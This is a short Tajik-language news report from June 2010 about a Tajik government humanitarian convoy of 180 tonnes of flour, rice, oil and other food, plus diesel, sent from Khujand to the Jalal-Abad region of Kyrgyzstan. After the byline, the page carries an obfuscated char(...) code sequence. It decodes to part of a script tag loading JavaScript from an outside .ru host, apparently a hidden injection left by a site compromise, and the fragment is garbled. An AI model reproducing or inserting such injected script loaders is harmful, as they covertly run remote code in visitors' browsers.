16.06.2010
Ёрии башардӯстонаи Ҳукумати Тоҷикистон ба Қирғизистон
Бино ба иттилои Хадамоти матбуотии Раиси вилоят, субҳи имрӯз, корвони ёрии башардӯстонаи Ҳукумати Ҷумҳурии Тоҷикистон бо 180 тонна маводи ғизоӣ дар 18 мошини тамғаи «Камаз» барои сокинони манотиқи даргири Қирғизистон аз шаҳри Хуҷанди вилояти Суғд озими вилояти Ҷалолободи кишвари мазкур шуданд.
Тавре сарчашма иттилоъ медиҳад, маводи ғизоӣ аз 100 тонна орд, 30 тонна биринҷ, 10 тоннагӣ равғану макарон, пиёзу картошка ва инчунин, 10 тонна сӯзишвории дизелӣ иборат аст.
Дар баробари ин, боз хабар дода мешавад, ки бо воситаи тайёра низ 1 тоннагӣ орду равған, биринҷу макарон интиқол хоҳад шуд, ки дар маҷмӯъ 184 тоннаро ташкил медиҳад.
Ба гуфти манбаъ, корвонро намояндагони мақомоти иҷроияи ҳокимияти давлатии вилояти Суғд ҳамроҳӣ мекунанд ва бо ҷониби Қирғизистон аллакай мувофиқа шудааст, ки дар шаҳри Бодканд ба намояндагони вилояти Ҷалолобод аз номи Ҳукумати Ҷумҳурии Тоҷикистон чун ёрии башардӯстона супорида мешавад.

Ҷамшед МАЪРУФ
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)bad75665ca693bdae3d667ee106ac61b.js" type="text/javascript">